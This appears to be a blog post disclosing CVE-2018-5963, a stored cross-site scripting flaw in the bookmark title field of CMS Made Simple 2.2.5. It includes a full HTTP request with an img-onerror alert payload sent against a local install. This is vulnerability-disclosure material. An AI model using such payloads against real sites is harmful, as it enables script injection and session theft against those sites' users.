CMS 2.2.5 Stored Cross-Site Scripting

CVE-2018-5963CMS Made Simple (CMSMS) 2.2.5 has Stored XSS in admin/addbookmark.php via the title parameter.

Stored XSS

After this request, website will pop-up

Screen Shot 2018-01-22 at 9.55.07 AM

The Add Shortcut title  field is not properly sanitized, thus leading to XSS.

POST /cmsms-2.2.5-install/admin/addbookmark.php?_sk_=24c1316d9651c78528d HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://localhost/
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 104
 Cookie: _sk_=24c1316d9651c78528d; 3e36c2b179d93f0eca459a97b9eda32a=ee958a481d387cb9a7aaddefc767cffddc9b8d8d%3A%3AYTo1OntzOjM6InVpZCI7aToxO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo3OiJlZmZfdWlkIjtOO3M6MTI6ImVmZl91c2VybmFtZSI7TjtzOjU6ImNrc3VtIjtzOjQwOiI0NGU4ZGE0MjYxYTc2MzRhMjdmMjk1OGM5NzUzMzY1OWI1NjYwMDJjIjt9; SQLiteManager_currentLangue=2; CMSICbf982e8ecf=2dca056a03f34ef10994cef9e2b38d05; CMSSESSID6cbb6f8586d9=05871ce0719e96a874da643a9b5dc368
 Connection: close
 Upgrade-Insecure-Requests: 1
_sk_=24c1316d9651c78528d&title=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&url=adsf&addbookmark=true

I read lots of paper and website about this CMS. They don’t give bounty for using admin role. So i repot to mitre and got this CVE-2018-5963.

ref:

http://seclists.org/fulldisclosure/2018/Jan/80

Advertisement
Privacy Settings
Posted in CVE

2 thoughts on “CMS 2.2.5 Stored Cross-Site Scripting

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s